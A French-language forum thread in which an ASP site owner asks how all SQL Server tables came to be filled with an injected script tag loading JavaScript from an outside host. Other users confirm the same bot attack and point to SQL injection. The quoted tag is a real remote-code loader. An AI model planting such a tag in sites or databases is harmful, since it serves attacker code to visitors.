Vulnérabilité SQL serveur et ASP
Fantome
-
razi -
razi -
Bonjour,
Voila j'ai un site developpé en asp avec une base de données SQl serveur. Un matin toutes les tables de la base on été infecté de code javascript venant de cette adresse <script src=http://www.dota11.cn/m.js></script>.
J'aimérai savoir comment l'attque a été possible et comment me protéger défiitivement.
Voila j'ai un site developpé en asp avec une base de données SQl serveur. Un matin toutes les tables de la base on été infecté de code javascript venant de cette adresse <script src=http://www.dota11.cn/m.js></script>.
J'aimérai savoir comment l'attque a été possible et comment me protéger défiitivement.
Configuration: Windows XP Internet Explorer 7.0
3 réponses
-
Je viens de subir la meme chose
Je préciserais simplement que le robot qui a effectué l'attaque a modifie les champs varchar pour ajouter le tag script que Fantome mentionne
Est ce que vous avez une idée ? -
Bonjour,
c'est la seconde fois que cela m'arrive. pas d'idées. A part refaire un restore de la base
Sébastien -
Le problème est discuté sur le forum Microsoft.
C'est un problème d'injection. La solution est postée.
http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3409559&SiteID=1